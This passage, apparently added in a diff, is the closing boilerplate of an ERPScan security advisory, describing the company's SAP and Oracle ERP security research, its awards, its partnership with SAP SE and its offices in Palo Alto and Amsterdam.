+mobile/embedded to reverse engineering and ICS/SCADA systems,
+accumulating their experience to conduct the best SAP security
+research.
+
+
+11. ABOUT ERPScan
+
+ERPScan is the most respected and credible Business Application
+Security provider. Founded in 2010, the company operates globally and
+enables large Oil and Gas, Financial and Retail organizations to
+secure their mission-critical processes. Named as an ‘Emerging Vendor’
+in Security by CRN, listed among “TOP 100 SAP Solution providers” and
+distinguished by 30+ other awards, ERPScan is the leading SAP SE
+partner in discovering and resolving security vulnerabilities. ERPScan
+consultants work with SAP SE in Walldorf to assist in improving the
+security of their latest solutions.
+
+ERPScan’s primary mission is to close the gap between technical and
+business security, and provide solutions to evaluate and secure SAP
+and Oracle ERP systems and business-critical applications from both,
+cyber-attacks as well as internal fraud. Usually our clients are large
+enterprises, Fortune 2000 companies and managed service providers
+whose requirements are to actively monitor and manage security of vast
+SAP landscapes on a global scale.
+
+We ‘follow the sun’ and function in two hubs, located in the Palo Alto
+and Amsterdam to provide threat intelligence services, agile support
+and operate local offices and partner network spanning 20+ countries
+around the globe.